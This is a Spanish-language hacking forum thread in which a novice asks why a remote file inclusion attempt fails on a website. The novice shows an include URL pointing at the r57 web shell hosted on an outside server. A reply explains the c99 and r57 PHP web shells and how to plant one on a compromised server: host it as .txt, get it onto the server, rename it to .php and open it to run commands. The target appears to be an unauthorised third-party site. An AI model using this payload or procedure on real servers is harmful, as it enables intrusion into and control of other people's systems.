quisiera saber si estas shells funcionan generalmente o si en realidad son como los troyanos conocidos que saltan el antivirus al mas minimo indicio. Gracias.

se que es una shell, lo del troyano es por lo rapido que un troyano pierde su utilidad cuando se hace conocido, y pensaba que con estas shells podria pasar lo mismo.

alguien me podria decir porque esto funciona:

php?url=www.google.com

y esto no funciona

php?url=usuarios.lycos.es/theripperm/shell/r57.txt

este ultimo solo me muestra el contenido del txt y no me ejecuta ninguna shell, pude ser porque dice url, y quizas deberia decir page o file ? o algo asi?

 

Y seguro que es vulnerable?

no es inclusion por iframes?

Suele pasar

checa si en lugar de hacer include con php sea con iframes, o frames

mm todavia con el ? al final no funciona, seguro que no es vulnerable. 


como verifico esto? es que hace poco que estoy con esto y XSS y estoy bastante en bolas.

me fijè en el codigo fuente de la pagina y creo que puede ser algo de lo que decis


si es esto, como tendria que decir en el codigo fuente para saber que es vulnerable? o que es lo que tendria que detectar ademas de que abra google?

ah y de verdad muchas gracias a los dos por darme una mano 

Hola vamos a aclarar algunas cosas.

Creo que a lo que le llamas troyano es a los tipicos troyanos de windows. Programas ejecutables.

Estas (c99 y r57) son shell web.
Estas 2 en este caso son aplicaciones php que te dan funcionales que la podriamos meter en la categoria de shell ya que podes correr comandos en el servidor donde esten corriendo, por lo general linux.

Como toda aplicacion web, esta corre con los permisos que corre el servidor web, que por lo general es apache o lighttpd.

Por esta ultima razon segun con que user corra el webserver, por lo general como "nobody", tienes muy poco permiso para "hacer cosas"

La shell por lo general cuando la quieras subir para comprometer un servidor, la renombras a .txt porque si en el server donde esta interpreta los .php, lo que obtenes cuando la quieras subir al servidor comprometido es la interpretacion del .php que es una pagina web y no el sourcecode el php, por eso al renombrar la shell a .txt no se interpreta, y subes al server comprometido todo el codigo .php

Luego que subiste la shell al server comprometido, renombras el .txt a .php e ingresas por http o https a la shell y obtendras una interface para "hacer cosas" en el server.

Instalate un Apache+php en una VM y probalas.